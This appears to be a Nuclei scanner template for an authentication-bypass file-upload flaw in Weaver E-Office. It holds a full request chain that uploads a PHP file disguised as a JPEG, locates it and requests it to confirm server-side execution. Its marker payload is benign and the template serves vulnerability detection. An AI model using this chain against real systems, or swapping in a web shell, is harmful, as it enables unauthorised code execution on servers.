id: CVD-2022-5298

info:
  name: 泛微 E-Office sample 权限绕过 file-upload 后台文件上传漏洞
  author: SleepingBag945
  severity: critical
  description: |
    e-office是上海泛微网络科技股份有限公司一款标准协同移动办公平台。存在权限绕过漏洞，攻击者可以绕过权限校验上传任意文件。


variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(8))}}"

http:
  - raw:
      - |
        GET /sample.php HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate

      - |
        POST /inc/ext/upload/file-upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary=----{{boundary}}
        Accept-Encoding: gzip

        ------{{boundary}}
        Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php4"
        Content-Type: image/jpeg

        <?php echo 111*111;unlink(__FILE__);?>
        ------{{boundary}}--

      - |
        GET /general/address/view/get-images.php?alb_id=11&start=0&limit=1 HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate

      - |
        GET {{fileurl}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
        Connection: close

    cookie-reuse: true
    extractors:
      - type: json
        part: body_3
        name: fileurl    #提取第三个响应包的文件url路径
        internal: true
        json:
          - .images[0].frist_url

    matchers:
      - type: dsl
        dsl:
          - contains_all(body_4,12321) && status_code == 200

